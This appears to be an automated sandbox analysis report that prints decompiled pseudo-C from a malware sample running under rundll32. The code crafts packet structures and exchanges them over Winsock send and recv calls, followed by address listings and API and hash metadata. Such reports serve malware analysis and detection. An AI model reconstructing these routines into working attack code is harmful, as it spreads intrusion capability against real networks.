                                                                                                                                                              				 *((char*)(_t302 + 8)) = 0x25;
                                                                                                                                                              				 *((char*)(_t302 + 0x24)) = 0xe;
                                                                                                                                                              				 *(_t302 + 0x31) =  *(_t302 + 0x31) | 0xffffffff;
                                                                                                                                                              				_t207 = 4;
                                                                                                                                                              				 *((short*)(_t302 + 0x37)) = _t207;
                                                                                                                                                              				_t208 = 0x40;
                                                                                                                                                              				 *((short*)(_t302 + 0x39)) = _t208;
                                                                                                                                                              				_t209 = 5;
                                                                                                                                                              				 *((short*)(_t302 + 0x41)) = _t209;
                                                                                                                                                              				 *((short*)(_t302 + 0x27)) =  *((intOrPtr*)( *_a16 + 0x7c)) - 0x200;
                                                                                                                                                              				 *((short*)(_t302 + 0x44)) = _a12;
                                                                                                                                                              				_t289 = HeapAlloc(GetProcessHeap(), 8, 0x1638);
                                                                                                                                                              				_v12 = _t289;
                                                                                                                                                              				if(_t289 == 0) {
                                                                                                                                                              					L26:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t302);
                                                                                                                                                              					_t300 = _v20;
                                                                                                                                                              					goto L27;
                                                                                                                                                              				}
                                                                                                                                                              				memcpy(_t289, _t240, 0x1124);
                                                                                                                                                              				_t110 = _t289 + 0x1124; // 0x1124
                                                                                                                                                              				_t217 = memcpy(_t110, _v20, 0x160);
                                                                                                                                                              				__imp__#9(0x50);
                                                                                                                                                              				 *(_t240 + 2) = _t217;
                                                                                                                                                              				 *((short*)(_t240 + 0x22)) = _a12;
                                                                                                                                                              				_t261 = 4;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x28)) = _t261;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                              				 *(_t240 + 0x40) =  *(_t240 + 0x40) & 0x00000000;
                                                                                                                                                              				_t271 =  *((intOrPtr*)( *_a16 + 0x74)) - 0x1000;
                                                                                                                                                              				 *(_t240 + 0x44) =  *(_t240 + 0x44) & 0x00000000;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x30)) = 0x1000;
                                                                                                                                                              				 *(_t240 + 0x34) = _t271;
                                                                                                                                                              				_t223 = 5;
                                                                                                                                                              				 *((short*)(_t240 + 0x49)) = _t223;
                                                                                                                                                              				_t224 = 7;
                                                                                                                                                              				 *((short*)(_t240 + 0x4b)) = _t224;
                                                                                                                                                              				_t126 = _t289 + 0x1284; // 0x1284
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x38)) = _t261;
                                                                                                                                                              				_t262 = 0x15;
                                                                                                                                                              				 *(_t240 + 0x2c) = _t271;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                              				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                              				_t226 = memcpy(_t126, _t240, _t262 << 2);
                                                                                                                                                              				_t313 = _t310 + 0x24;
                                                                                                                                                              				_t132 = _t226 + 0x54; // 0x12d8
                                                                                                                                                              				_t304 = _t132;
                                                                                                                                                              				_t293 = 0xc;
                                                                                                                                                              				do {
                                                                                                                                                              					_t227 = _v16;
                                                                                                                                                              					 *((short*)(_t227 + 0x22)) =  *((short*)(_t227 + 0x22)) + 1;
                                                                                                                                                              					memcpy(_t304, _t227, 0x48);
                                                                                                                                                              					_t313 = _t313 + 0xc;
                                                                                                                                                              					_t304 = _t304 + 0x48;
                                                                                                                                                              					_t293 = _t293 - 1;
                                                                                                                                                              				} while (_t293 != 0);
                                                                                                                                                              				_t305 = __imp__#19;
                                                                                                                                                              				_push(_t293);
                                                                                                                                                              				_push(0x111c);
                                                                                                                                                              				_push(_v12);
                                                                                                                                                              				_push(_a4);
                                                                                                                                                              				if( *_t305() <= 0) {
                                                                                                                                                              					L25:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              					_t302 = _v16;
                                                                                                                                                              					goto L26;
                                                                                                                                                              				}
                                                                                                                                                              				_push(_t293);
                                                                                                                                                              				_push(0x51c);
                                                                                                                                                              				_push(_v12 + 0x111c);
                                                                                                                                                              				_push(_a4);
                                                                                                                                                              				if( *_t305() <= 0) {
                                                                                                                                                              					goto L25;
                                                                                                                                                              				}
                                                                                                                                                              				_t306 = __imp__#16;
                                                                                                                                                              				_push(_t293);
                                                                                                                                                              				_a12 = _t293;
                                                                                                                                                              				_push(0xffff);
                                                                                                                                                              				_push(_v8);
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t235 =  *_t306(_a4);
                                                                                                                                                              					if(_t235 <= 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t264 = _v8;
                                                                                                                                                              					_a12 = _a12 + _t235;
                                                                                                                                                              					if( *((intOrPtr*)(_t264 + 9)) != 0) {
                                                                                                                                                              						goto L25;
                                                                                                                                                              					}
                                                                                                                                                              					if(_a12 >= 0x147b) {
                                                                                                                                                              						if(E04E22708(_t264, _t264, _t235, _a16) != 0) {
                                                                                                                                                              							_v24 = _v24 & 0x00000000;
                                                                                                                                                              							 *((short*)( *_a8 + 0x22)) = _v32;
                                                                                                                                                              						}
                                                                                                                                                              						goto L25;
                                                                                                                                                              					}
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0xffff);
                                                                                                                                                              					_push(_t264);
                                                                                                                                                              				}
                                                                                                                                                              				goto L25;
                                                                                                                                                              			}
































































                                                                                                                                                              0x04e229b8
                                                                                                                                                              0x04e229c8
                                                                                                                                                              0x04e229ca
                                                                                                                                                              0x04e229cf
                                                                                                                                                              0x04e22e08
                                                                                                                                                              0x04e22e0f
                                                                                                                                                              0x04e22e0f
                                                                                                                                                              0x04e229e1
                                                                                                                                                              0x04e229e5
                                                                                                                                                              0x04e22df6
                                                                                                                                                              0x04e22e02
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22e02
                                                                                                                                                              0x04e229eb
                                                                                                                                                              0x04e229f0
                                                                                                                                                              0x04e229f6
                                                                                                                                                              0x04e229f9
                                                                                                                                                              0x04e22a03
                                                                                                                                                              0x04e22a07
                                                                                                                                                              0x04e22a20
                                                                                                                                                              0x04e22a23
                                                                                                                                                              0x04e22a23
                                                                                                                                                              0x04e22a25
                                                                                                                                                              0x04e22a2d
                                                                                                                                                              0x04e22a31
                                                                                                                                                              0x04e22a32
                                                                                                                                                              0x04e22a35
                                                                                                                                                              0x04e22a3a
                                                                                                                                                              0x04e22a3b
                                                                                                                                                              0x04e22a41
                                                                                                                                                              0x04e22a47
                                                                                                                                                              0x04e22a49
                                                                                                                                                              0x04e22a51
                                                                                                                                                              0x04e22a55
                                                                                                                                                              0x04e22a5c
                                                                                                                                                              0x04e22a5f
                                                                                                                                                              0x04e22a66
                                                                                                                                                              0x04e22a69
                                                                                                                                                              0x04e22a70
                                                                                                                                                              0x04e22a73
                                                                                                                                                              0x04e22a76
                                                                                                                                                              0x04e22a7a
                                                                                                                                                              0x04e22a7e
                                                                                                                                                              0x04e22a84
                                                                                                                                                              0x04e22a88
                                                                                                                                                              0x04e22a89
                                                                                                                                                              0x04e22a8d
                                                                                                                                                              0x04e22a91
                                                                                                                                                              0x04e22a96
                                                                                                                                                              0x04e22a9e
                                                                                                                                                              0x04e22a9f
                                                                                                                                                              0x04e22aaa
                                                                                                                                                              0x04e22aae
                                                                                                                                                              0x04e22ab3
                                                                                                                                                              0x04e22ab7
                                                                                                                                                              0x04e22abb
                                                                                                                                                              0x04e22ac3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22ad2
                                                                                                                                                              0x04e22ada
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22adc
                                                                                                                                                              0x04e22adc
                                                                                                                                                              0x04e22adf
                                                                                                                                                              0x04e22ae5
                                                                                                                                                              0x04e22ae7
                                                                                                                                                              0x04e22aef
                                                                                                                                                              0x04e22af0
                                                                                                                                                              0x04e22afc
                                                                                                                                                              0x04e22aff
                                                                                                                                                              0x04e22b02
                                                                                                                                                              0x04e22b06
                                                                                                                                                              0x04e22b0c
                                                                                                                                                              0x04e22b14
                                                                                                                                                              0x04e22b20
                                                                                                                                                              0x04e22b24
                                                                                                                                                              0x04e22b25
                                                                                                                                                              0x04e22b2a
                                                                                                                                                              0x04e22b31
                                                                                                                                                              0x04e22b37
                                                                                                                                                              0x04e22b3a
                                                                                                                                                              0x04e22b3b
                                                                                                                                                              0x04e22b4b
                                                                                                                                                              0x04e22b4e
                                                                                                                                                              0x04e22b51
                                                                                                                                                              0x04e22b58
                                                                                                                                                              0x04e22b5b
                                                                                                                                                              0x04e22b62
                                                                                                                                                              0x04e22b66
                                                                                                                                                              0x04e22b71
                                                                                                                                                              0x04e22b77
                                                                                                                                                              0x04e22b7c
                                                                                                                                                              0x04e22de6
                                                                                                                                                              0x04e22df0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22df0
                                                                                                                                                              0x04e22b86
                                                                                                                                                              0x04e22b8e
                                                                                                                                                              0x04e22b8e
                                                                                                                                                              0x04e22b90
                                                                                                                                                              0x04e22b96
                                                                                                                                                              0x04e22b99
                                                                                                                                                              0x04e22ba2
                                                                                                                                                              0x04e22ba5
                                                                                                                                                              0x04e22ba9
                                                                                                                                                              0x04e22bad
                                                                                                                                                              0x04e22bb1
                                                                                                                                                              0x04e22bb8
                                                                                                                                                              0x04e22bbc
                                                                                                                                                              0x04e22bbe
                                                                                                                                                              0x04e22bc4
                                                                                                                                                              0x04e22bc8
                                                                                                                                                              0x04e22bc9
                                                                                                                                                              0x04e22bdf
                                                                                                                                                              0x04e22be1
                                                                                                                                                              0x04e22be6
                                                                                                                                                              0x04e22dd6
                                                                                                                                                              0x04e22de0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22de0
                                                                                                                                                              0x04e22bf3
                                                                                                                                                              0x04e22bf6
                                                                                                                                                              0x04e22bf6
                                                                                                                                                              0x04e22bf8
                                                                                                                                                              0x04e22bfe
                                                                                                                                                              0x04e22c01
                                                                                                                                                              0x04e22c09
                                                                                                                                                              0x04e22c14
                                                                                                                                                              0x04e22c1f
                                                                                                                                                              0x04e22c23
                                                                                                                                                              0x04e22c2b
                                                                                                                                                              0x04e22c32
                                                                                                                                                              0x04e22c35
                                                                                                                                                              0x04e22c39
                                                                                                                                                              0x04e22c3c
                                                                                                                                                              0x04e22c40
                                                                                                                                                              0x04e22c41
                                                                                                                                                              0x04e22c4e
                                                                                                                                                              0x04e22c54
                                                                                                                                                              0x04e22c65
                                                                                                                                                              0x04e22c67
                                                                                                                                                              0x04e22c6c
                                                                                                                                                              0x04e22dc3
                                                                                                                                                              0x04e22dcd
                                                                                                                                                              0x04e22dd3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22dd3
                                                                                                                                                              0x04e22c79
                                                                                                                                                              0x04e22c89
                                                                                                                                                              0x04e22c90
                                                                                                                                                              0x04e22c9a
                                                                                                                                                              0x04e22ca0
                                                                                                                                                              0x04e22ca8
                                                                                                                                                              0x04e22cb3
                                                                                                                                                              0x04e22cb4
                                                                                                                                                              0x04e22cb7
                                                                                                                                                              0x04e22cc1
                                                                                                                                                              0x04e22cca
                                                                                                                                                              0x04e22ccc
                                                                                                                                                              0x04e22cd0
                                                                                                                                                              0x04e22cd7
                                                                                                                                                              0x04e22cda
                                                                                                                                                              0x04e22cdd
                                                                                                                                                              0x04e22ce1
                                                                                                                                                              0x04e22ce4
                                                                                                                                                              0x04e22ce8
                                                                                                                                                              0x04e22cee
                                                                                                                                                              0x04e22cf1
                                                                                                                                                              0x04e22cf6
                                                                                                                                                              0x04e22cf9
                                                                                                                                                              0x04e22d00
                                                                                                                                                              0x04e22d04
                                                                                                                                                              0x04e22d04
                                                                                                                                                              0x04e22d08
                                                                                                                                                              0x04e22d08
                                                                                                                                                              0x04e22d0b
                                                                                                                                                              0x04e22d0c
                                                                                                                                                              0x04e22d0c
                                                                                                                                                              0x04e22d0f
                                                                                                                                                              0x04e22d17
                                                                                                                                                              0x04e22d1c
                                                                                                                                                              0x04e22d1f
                                                                                                                                                              0x04e22d22
                                                                                                                                                              0x04e22d22
                                                                                                                                                              0x04e22d25
                                                                                                                                                              0x04e22d2b
                                                                                                                                                              0x04e22d2c
                                                                                                                                                              0x04e22d31
                                                                                                                                                              0x04e22d34
                                                                                                                                                              0x04e22d3b
                                                                                                                                                              0x04e22dae
                                                                                                                                                              0x04e22dba
                                                                                                                                                              0x04e22dc0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22dc0
                                                                                                                                                              0x04e22d40
                                                                                                                                                              0x04e22d41
                                                                                                                                                              0x04e22d4b
                                                                                                                                                              0x04e22d4c
                                                                                                                                                              0x04e22d53
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22d55
                                                                                                                                                              0x04e22d5b
                                                                                                                                                              0x04e22d5c
                                                                                                                                                              0x04e22d64
                                                                                                                                                              0x04e22d65
                                                                                                                                                              0x04e22d83
                                                                                                                                                              0x04e22d86
                                                                                                                                                              0x04e22d8a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22d6a
                                                                                                                                                              0x04e22d6d
                                                                                                                                                              0x04e22d74
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22d7d
                                                                                                                                                              0x04e22d9b
                                                                                                                                                              0x04e22da6
                                                                                                                                                              0x04e22daa
                                                                                                                                                              0x04e22daa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22d9b
                                                                                                                                                              0x04e22d7f
                                                                                                                                                              0x04e22d81
                                                                                                                                                              0x04e22d82
                                                                                                                                                              0x04e22d82
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74654F20,?,04E24775), ref: 04E229BF
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E24775), ref: 04E229C8
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001124,?,04E24775), ref: 04E229DC
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E24775), ref: 04E229DF
                                                                                                                                                              • rand.MSVCRT ref: 04E229F0
                                                                                                                                                              • htons.WS2_32(00000050), ref: 04E22A25
                                                                                                                                                              • rand.MSVCRT ref: 04E22A7E
                                                                                                                                                              • rand.MSVCRT ref: 04E22A96
                                                                                                                                                              • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04E22ABB
                                                                                                                                                              • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04E22AD2
                                                                                                                                                              • rand.MSVCRT ref: 04E22AE7
                                                                                                                                                              • htons.WS2_32(00001120), ref: 04E22B06
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000160,?,04E24775), ref: 04E22B6A
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E24775), ref: 04E22B71
                                                                                                                                                              • htons.WS2_32(0000015C), ref: 04E22B90
                                                                                                                                                              • rand.MSVCRT ref: 04E22BBE
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000048,?,04E24775), ref: 04E22BD2
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E24775), ref: 04E22BD9
                                                                                                                                                              • htons.WS2_32(00000044), ref: 04E22BF8
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001638,?,04E24775), ref: 04E22C58
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E24775), ref: 04E22C5F
                                                                                                                                                              • memcpy.MSVCRT ref: 04E22C79
                                                                                                                                                              • memcpy.MSVCRT ref: 04E22C90
                                                                                                                                                              • htons.WS2_32(00000050), ref: 04E22C9A
                                                                                                                                                              • memcpy.MSVCRT ref: 04E22D17
                                                                                                                                                              • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04E22D37
                                                                                                                                                              • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04E22D4F
                                                                                                                                                              • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04E22D86
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04E24775), ref: 04E22DB3
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04E24775), ref: 04E22DBA
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,04E24775), ref: 04E22DC6
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E24775), ref: 04E22DCD
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,04E24775), ref: 04E22DD9
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E24775), ref: 04E22DE0
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,04E24775), ref: 04E22DE9
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E24775), ref: 04E22DF0
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,04E24775), ref: 04E22DFB
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E24775), ref: 04E22E02
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 2063504749-3175316637
                                                                                                                                                              • Opcode ID: ece7c103578836a65a8bdb5874af82fe8a2a1079d1fbc3f92a6c098abd4c6e25
                                                                                                                                                              • Instruction ID: 3a09d1fc8bd245c072471da0cbeaea42ed5d4d6a173ba206e3a8ce2e3e1d59e1
                                                                                                                                                              • Opcode Fuzzy Hash: ece7c103578836a65a8bdb5874af82fe8a2a1079d1fbc3f92a6c098abd4c6e25
                                                                                                                                                              • Instruction Fuzzy Hash: 2AE1BE76900305EFEB249FA4CE45FAA7BB4FF48711F104059EB049B295E7B6E840CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E04E23D0D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, short _a12, intOrPtr _a16, void* _a20, void** _a24, long _a28, void* _a32) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _t139;
                                                                                                                                                              				short _t158;
                                                                                                                                                              				void* _t169;
                                                                                                                                                              				signed int _t173;
                                                                                                                                                              				int _t176;
                                                                                                                                                              				void* _t184;
                                                                                                                                                              				signed short _t186;
                                                                                                                                                              				intOrPtr _t207;
                                                                                                                                                              				void* _t212;
                                                                                                                                                              				short _t219;
                                                                                                                                                              				void* _t223;
                                                                                                                                                              				intOrPtr* _t225;
                                                                                                                                                              				short _t227;
                                                                                                                                                              				short _t228;
                                                                                                                                                              				signed int _t229;
                                                                                                                                                              				intOrPtr* _t234;
                                                                                                                                                              				intOrPtr _t243;
                                                                                                                                                              				void* _t255;
                                                                                                                                                              				void* _t261;
                                                                                                                                                              
                                                                                                                                                              				_t243 = __edx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t139 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v12 = _t139;
                                                                                                                                                              				if(_t139 == 0) {
                                                                                                                                                              					L24:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t261 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                              				if(_t261 == 0) {
                                                                                                                                                              					L23:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              					goto L24;
                                                                                                                                                              				}
                                                                                                                                                              				 *_t261 = 0x12;
                                                                                                                                                              				 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                                                                              				_t223 = HeapAlloc(GetProcessHeap(), 8, 0x3d);
                                                                                                                                                              				if(_t223 == 0) {
                                                                                                                                                              					L22:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t261);
                                                                                                                                                              					goto L23;
                                                                                                                                                              				}
                                                                                                                                                              				_t225 =  *_a32;
                                                                                                                                                              				if(1 !=  *_t225) {
                                                                                                                                                              					 *(_t261 + 8) = 0x3c;
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					asm("adc edx, [ecx+0x4c]");
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 9)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 0x11)) = _a16;
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 0x15)) = _a20;
                                                                                                                                                              					_t158 = _a28;
                                                                                                                                                              					asm("adc edx, 0x0");
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 0xd)) =  *((intOrPtr*)(_t225 + 0x4c));
                                                                                                                                                              					 *((char*)(_t223 + 0x21)) = 8;
                                                                                                                                                              					 *((char*)(_t223 + 0x25)) = 8;
                                                                                                                                                              					 *((char*)(_t223 + 0x29)) = 8;
                                                                                                                                                              					 *((short*)(_t223 + 0x2d)) = _t158;
                                                                                                                                                              					 *((short*)(_t223 + 0x31)) = _t158;
                                                                                                                                                              					 *((short*)(_t223 + 0x35)) = _t158;
                                                                                                                                                              					 *((char*)(_t223 + 0x3b)) = 5;
                                                                                                                                                              				} else {
                                                                                                                                                              					 *(_t261 + 8) = 0x30;
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					asm("adc edx, [ecx+0x4c]");
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                                                                              					 *((intOrPtr*)(_t223 + 9)) = _a16;
                                                                                                                                                              					_t219 = _a28;
                                                                                                                                                              					 *((char*)(_t223 + 0x15)) = 8;
                                                                                                                                                              					 *((char*)(_t223 + 0x19)) = 8;
                                                                                                                                                              					 *((char*)(_t223 + 0x1d)) = 8;
                                                                                                                                                              					 *((short*)(_t223 + 0x21)) = _t219;
                                                                                                                                                              					 *((short*)(_t223 + 0x25)) = _t219;
                                                                                                                                                              					 *((short*)(_t223 + 0x29)) = _t219;
                                                                                                                                                              					 *((char*)(_t223 + 0x2f)) = 5;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t261 + 0x18) =  *(_t261 + 8);
                                                                                                                                                              				 *(_t261 + 0x20) =  *(_t225 + 0x53) & 0x000000ff;
                                                                                                                                                              				 *(_t261 + 0x25) = ( *(_t261 + 0x18) & 0x0000ffff) + 1;
                                                                                                                                                              				if(E04E23209(_t225, _a4,  *_a8,  *(_t225 + 0x30) & 0x0000ffff, _t261, _t223, ( *(_t261 + 0x18) & 0x0000ffff) + 1) == 0) {
                                                                                                                                                              					L21:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t223);
                                                                                                                                                              					goto L22;
                                                                                                                                                              				} else {
                                                                                                                                                              					Sleep(0x7d0);
                                                                                                                                                              					_t169 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                                                                              					_a20 = _t169;
                                                                                                                                                              					if(_t169 == 0) {
                                                                                                                                                              						goto L21;
                                                                                                                                                              					}
                                                                                                                                                              					 *((intOrPtr*)(_t169 + 8)) = 0x42e0;
                                                                                                                                                              					 *((intOrPtr*)(_t169 + 0x10)) = 0x42e0;
                                                                                                                                                              					 *_t169 = 0x13;
                                                                                                                                                              					 *(_t169 + 0x14) = 4;
                                                                                                                                                              					 *((intOrPtr*)(_t169 + 0x18)) = 0x4c;
                                                                                                                                                              					_t227 = 5;
                                                                                                                                                              					 *((short*)(_t169 + 0x25)) = _t227;
                                                                                                                                                              					 *((intOrPtr*)(_t169 + 4)) = 0x1000;
                                                                                                                                                              					 *((intOrPtr*)(_t169 + 0xc)) = 0x1000;
                                                                                                                                                              					_t228 = 7;
                                                                                                                                                              					 *((short*)(_t169 + 0x27)) = _t228;
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					asm("stosw");
                                                                                                                                                              					asm("stosb");
                                                                                                                                                              					 *((short*)(_t223 + 3)) = _a12;
                                                                                                                                                              					_t173 = rand();
                                                                                                                                                              					_t229 = 0x28;
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					 *( *_a8 + 0x22) =  *( *_a8 + 0x22) + _t173 % _t229;
                                                                                                                                                              					_t253 = _a8;
                                                                                                                                                              					_t231 =  *( *_a8 + 0x22) & 0x0000ffff;
                                                                                                                                                              					_t176 = E04E232AF(_a4,  *_a8,  *( *_a8 + 0x22) & 0x0000ffff, _a20, _t223,  *(_a20 + 0x27) & 0x0000ffff);
                                                                                                                                                              					if(_t176 == 0) {
                                                                                                                                                              						memset(_t261, _t176, 0x27);
                                                                                                                                                              						 *_t261 = 0x12;
                                                                                                                                                              						_t184 = E04E23209(_t231, _a4,  *_t253,  *( *_a32 + 0x32) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff);
                                                                                                                                                              						if(_t184 != 0) {
                                                                                                                                                              							_t255 = _v12;
                                                                                                                                                              							__imp__#16(_a4, _t255, 0xffff, 0);
                                                                                                                                                              							if(_t184 > 0 &&  *((intOrPtr*)(_t255 + 9)) == 0) {
                                                                                                                                                              								_a28 = _a28 & 0x0000ffff;
                                                                                                                                                              								_t186 =  *(_t255 + 2) & 0x0000ffff;
                                                                                                                                                              								__imp__#9(_t186);
                                                                                                                                                              								if(_a28 + 8 <= (_t186 & 0x0000ffff)) {
                                                                                                                                                              									_t234 =  *_a32;
                                                                                                                                                              									asm("cdq");
                                                                                                                                                              									asm("sbb eax, edx");
                                                                                                                                                              									 *((intOrPtr*)(_t234 + 0x48)) =  *((intOrPtr*)(_t255 + 0x4c)) - ( *(_t234 + 0x51) & 0x000000ff);
                                                                                                                                                              									 *((intOrPtr*)(_t234 + 0x4c)) =  *((intOrPtr*)(_v12 + 0x50));
                                                                                                                                                              									if(1 !=  *_t234) {
                                                                                                                                                              										 *(_t261 + 4) = 8;
                                                                                                                                                              									} else {
                                                                                                                                                              										 *(_t261 + 4) = 4;
                                                                                                                                                              									}
                                                                                                                                                              									 *(_t261 + 0xc) =  *(_t261 + 4);
                                                                                                                                                              									 *((intOrPtr*)(_t261 + 0x10)) = 0x48;
                                                                                                                                                              									 *(_t261 + 0x14) =  *(_t234 + 0x54) & 0x000000ff;
                                                                                                                                                              									 *(_t261 + 0x25) =  *(_t261 + 4) + 1;
                                                                                                                                                              									 *((intOrPtr*)(_t223 + 1)) =  *((intOrPtr*)(_t234 + 0x48));
                                                                                                                                                              									 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t234 + 0x4c));
                                                                                                                                                              									if(E04E23209(_t234, _a4,  *_a8,  *(_t234 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                              										Sleep(0x7d0);
                                                                                                                                                              										_push(2);
                                                                                                                                                              										asm("stosw");
                                                                                                                                                              										asm("stosb");
                                                                                                                                                              										 *(_t261 + 8) = 0;
                                                                                                                                                              										 *(_t261 + 0x18) = 0;
                                                                                                                                                              										_t207 =  *_a32;
                                                                                                                                                              										 *(_t261 + 4) = 0;
                                                                                                                                                              										 *(_t261 + 0xc) = 0;
                                                                                                                                                              										 *((intOrPtr*)(_t261 + 0x10)) = 0;
                                                                                                                                                              										 *(_t261 + 0x14) = 0;
                                                                                                                                                              										 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                                                                              										 *(_t261 + 0x20) =  *(_t207 + 0x59) & 0x000000ff;
                                                                                                                                                              										 *(_t261 + 0x25) =  *(_t261 + 8) + 1;
                                                                                                                                                              										 *((short*)(_t223 + 1)) =  *((intOrPtr*)(_t207 + 0x32));
                                                                                                                                                              										if(E04E23209( *(_t261 + 0x25) & 0x0000ffff, _a4,  *_a8,  *(_t207 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                              											Sleep(0x7d0);
                                                                                                                                                              											_t212 = HeapAlloc(GetProcessHeap(), 8, _a28);
                                                                                                                                                              											 *_a24 = _t212;
                                                                                                                                                              											if(_t212 != 0) {
                                                                                                                                                              												memcpy(_t212, _v12 + 0x54, _a28);
                                                                                                                                                              												_v5 = 1;
                                                                                                                                                              											}
